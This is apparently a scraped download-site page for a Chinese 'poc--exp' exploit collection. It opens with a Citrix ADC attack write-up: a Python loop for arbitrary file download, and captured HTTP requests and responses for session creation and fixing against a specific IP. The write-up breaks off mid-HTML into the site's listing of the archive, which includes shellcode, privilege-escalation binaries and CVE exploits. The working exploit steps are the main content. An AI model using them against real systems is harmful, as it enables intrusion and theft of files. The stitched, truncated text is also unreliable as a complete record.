# Citrix ADC Vulns
## CVE List
https://support.citrix.com/article/CTX276688
![](./Citrix_ADC.png)
##### Add if while Code
https://dmaasland.github.io/posts/citrix.html
```
response_str = json.dumps(r.headers.__dict__['_store'])
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("[+] Send Success!")
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
while 1:
PAYLOAD1 = quote(input("\n[+] Set File= "),"utf-8")
url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD1)
r = session.post(url=url, headers=headers, data=data, verify=False,proxies=proxies)
if r.status_code == 406 and "Content-Disposition" in response_str and r.headers["Accept-Ranges"] == "bytes" and r.headers["Pragma"] == "private":
print ("_"*80,"\n\n")
print (r.text)
print ("_"*80)
# pass
else:
print ("[+] Error!")
```
![](./index.png)
![](./send.png)
## 0x01 create_session
```
POST /pcidss/report?type=allprofiles&sid=loginchallengeresponse1requestbody&username=nsroot&set=1 HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Content-Type: application/xml
X-NITRO-USER: Cu59z69j
X-NITRO-PASS: vgR7HPQ0
Content-Length: 44
<appfwprofile><login></login></appfwprofile>
```
```
HTTP/1.1 406 Not Acceptable
Date: Fri, 10 Jul 2020 18:45:26 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Set-Cookie: SESSID=3be0633199c076f0613d084b758978c3; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 4489
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: application/xml; charset=utf-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
```
## 0x02 fix_session
```
GET /menu/ss?sid=nsroot&username=nsroot&force_setup=1 HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3
```
```
HTTP/1.1 302 Found
Date: Fri, 10 Jul 2020 18:45:27 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: is_cisco_platform=0; expires=Mon, 05-Jul-2021 18:45:27 GMT; Max-Age=31104000; path=/; HttpOnly
Location: /menu/neo
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 416
Keep-Alive: timeout=15, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div><div style="color: red; margin: 10px" title="More information about this error may be available in the server error log. Please contact the server administrator">An internal server error was encountered</div>
```
##### /menu/neo 302
```
GET /menu/neo HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0
```
```
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2020 18:45:29 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Set-Cookie: startupapp=neo; expires=Mon, 05-Jul-2021 18:45:29 GMT; Max-Age=31104000; path=/; HttpOnly
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 1771
Keep-Alive: timeout=15, max=98
Connection: Keep-Alive
Content-Type: text/html;application/octet-stream;application/ecmascript;application/json;application/xml;charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XDEV_HTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Citrix ADC - Configuration</title>
<script type="text/javascript">var neo_logout_url = "/menu/lo?rand=1450749159.1594406727843271";</script>
<script type="text/javascript">var neo_machine_sysid = "450010";var rand = "1450749159.1594406727843271";var partition_dir = "";var is_ha_supported_in_gui = "true";var login_warning = "";</script>
<script type="text/javascript">var global_data = "{global_data}";</script>
```
## 0x03 get_rand
```
GET /menu/stc HTTP/1.1
Host: 10.20.24.248
User-Agent: python-requests/2.24.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: SESSID=3be0633199c076f0613d084b758978c3; is_cisco_platform=0; startupapp=neo
```
```
HTTP/1.1 200 OK
Date: Fri, 10 Jul 2020 18:45:30 GMT
Server: Apache
X-Frame-Options: SAMEORIGIN
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Content-Security-Policy: default-src 'self'; style-src 'self' 'unsafe-inline' http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; script-src 'self' 'unsafe-inline' 'unsafe-eval' http://yui.yahooapis.com https://cis.citrix.com http://query.yahooapis.com https://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com; connect-src 'self' http://cis.citrix.com https://s3.amazonaws.com; img-src 'self' data: blob: http://cdn.pendo.io https://data.pendo.io https://pendo-static-5175857953112064.storage.googleapis.com;
Content-Length: 15505
Keep-Alive: timeout=15, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang=
没有合适的资源?快使用搜索试试~ 我知道了~
poc--exp:常用渗透poc收集
共298个文件
java:32个
md:30个
py:25个
5星 · 超过95%的资源 需积分: 46 22 下载量 97 浏览量
2021-03-20
16:42:11
上传
评论 2
收藏 12.57MB ZIP 举报
温馨提示
poc--exp 个人常用渗透poc收集 CVE-2014-4113 Win64bit本地提权漏洞 CVE-2014-4878海康RCE突破 CVE-2017-0143永恒之蓝突破 CVE-2017-0474安卓媒体服务器RCE CVE-2017-0641 Google Android Media框架远程代码执行漏洞 CVE-2017-11882办公室远程执行突破 CVE-2017-13156安卓janus漏洞 CVE-2017-5753英特尔侧信道攻击扩展 CVE-2017-7269 IIS6.0远程代码执行入侵复现 CVE-2018-15982 Flash突破 CVE-2018-19518 PHP imap_open函数任意命令执行漏洞 CVE-2018-20250 WinRAR目录穿越突破 CVE-2018-4407 IOS重叠重叠 CVE-2018-4878 Flash突破 CV
资源推荐
资源详情
资源评论
收起资源包目录
poc--exp:常用渗透poc收集 (298个子文件)
H5.apk 101KB
shellcode.asm 2KB
shellcode.asm 2KB
runExploit.bat 814B
Fix.bat 170B
usb_0xA1_2_arm64.bin 528B
alloc8-shellcode.bin 436B
steaks4uce-shellcode.bin 404B
SHAtter-shellcode.bin 372B
checkm8_armv7.bin 372B
limera1n-shellcode.bin 368B
checkm8_arm64.bin 328B
usb_0xA1_2_armv7.bin 292B
ibss-flash-nor-shellcode.bin 132B
t8015_shellcode_arm64.bin 48B
t8010_t8011_disable_wxn_arm64.bin 40B
24Kpwn-shellcode.bin 36B
screenshot.bmp 1.24MB
poc.c 15KB
source.c 5KB
poc.cpp 24KB
ReparsePoint.cpp 13KB
Source.cpp 12KB
Source.cpp 12KB
ms15-051.cpp 12KB
ms15-051.cpp 12KB
MsiExploit.cpp 9KB
mydll_exe.cpp 6KB
FileOpLock.cpp 5KB
AngryPolarBearBug.cpp 5KB
ms16-032.cpp 5KB
CommonUtils.cpp 4KB
Hardlink.cpp 3KB
ScopedHandle.cpp 2KB
mydll.cpp 814B
stdafx.cpp 304B
stdafx.cpp 304B
pch.cpp 188B
dxgi.dll 923KB
WalletService.dll 421KB
PoC.exe 285KB
MSFRottenPotato.exe 253KB
AngryPolarBearBug.exe 237KB
AngryPolarBearBug.exe 237KB
MsiExploit.exe 218KB
MsiExploit.exe 168KB
CVE-2020-1350.exe 119KB
CVE-2018-8120x64.exe 92KB
CVE-2018-8120.exe 92KB
ms16-032_x64.exe 87KB
win32.exe 86KB
CVE-2018-8120x86.exe 81KB
CVE-2018-8120.exe 81KB
ms16-032.exe 75KB
ms15-051.exe 54KB
ms15-051.exe 54KB
ms15-051.exe 47KB
ms15-051.exe 47KB
calc.exe 27KB
MsiExploit.filters 2KB
angrypolarbearbug.filters 2KB
poc.vcxproj.filters 1KB
CVE-2018-8120.vcxproj.filters 1KB
CVE-2018-8120.vcxproj.filters 1KB
ms15-051.vcxproj.filters 1012B
ms16-032.vcxproj.filters 991B
ms15-051.vcxproj.filters 988B
mydll.dll.vcxproj.filters 962B
mydll.vcxproj.filters 958B
msi_eop.gif 2.25MB
demo.gif 238KB
build.gradle 899B
build.gradle 498B
settings.gradle 15B
libusb-1.0.20.mavericks.bottle.1.tar.gz 166KB
libusb-1.0.22.mojave.bottle.tar.gz 163KB
libusb-1.0.22.el_capitan.bottle.tar.gz 159KB
libusb-1.0.22.sierra.bottle.tar.gz 159KB
libusb-1.0.22.high_sierra.bottle.tar.gz 159KB
libusb-1.0.21.yosemite.bottle.tar.gz 157KB
libusb-1.0.19.mountain_lion.bottle.1.tar.gz 122KB
ntimports.h 3KB
ntimports.h 2KB
pch.h 2KB
typed_buffer.h 1KB
typed_buffer.h 1KB
CommonUtils.h 1KB
ReparsePoint.h 1KB
FileOpLock.h 805B
ScopedHandle.h 498B
stdafx.h 365B
targetver.h 314B
stdafx.h 299B
test.hta 318B
index.html 11KB
calc.html 11KB
beforeIE11.html 10KB
beforeIE9.html 2KB
xml.html 180B
ibootpatcher 4KB
共 298 条
- 1
- 2
- 3
资源评论
- weixin_灵犀2021-08-18用户下载后在一定时间内未进行评价,系统默认好评。
weixin_42119358
- 粉丝: 29
- 资源: 4660
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功